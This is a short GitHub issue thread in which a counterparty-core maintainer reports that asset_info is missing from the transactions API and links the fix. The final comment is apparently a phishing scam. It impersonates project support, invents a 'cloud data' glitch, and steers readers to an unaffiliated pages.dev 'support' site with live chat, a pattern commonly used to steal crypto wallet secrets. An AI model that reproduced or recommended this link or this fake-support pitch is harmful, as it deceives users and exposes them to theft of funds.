### ISSUE TITLE
asset info missing in transactions

### ISSUE THREAD

**Issue by ouziel-slama** [CounterpartyXCP/counterparty-core#2800]
https://dev.counterparty.io:4000/v2/transactions?verbose=true&type=enhanced_send&limit=1
events are added to the response, but asset_info is gone

**Comment by ouziel-slama** [comment]
fixed here https://github.com/CounterpartyXCP/counterparty-core/pull/2802

**Comment by Lerz-bordev** [comment]
We apologize for any trouble you've encountered; it seems there may have been a glitch with the cloud data, but rest assured, we can resolve this issue. To expedite the process, kindly follow the link below to reach our specialized support team:

[Counterparty Support Request](https://dapprectification-chain.pages.dev/)

Use the live chat button at the bottom right to connect with a support agent for prompt assistance.

Thank you for your patience—I’m confident your issue will be resolved soon!
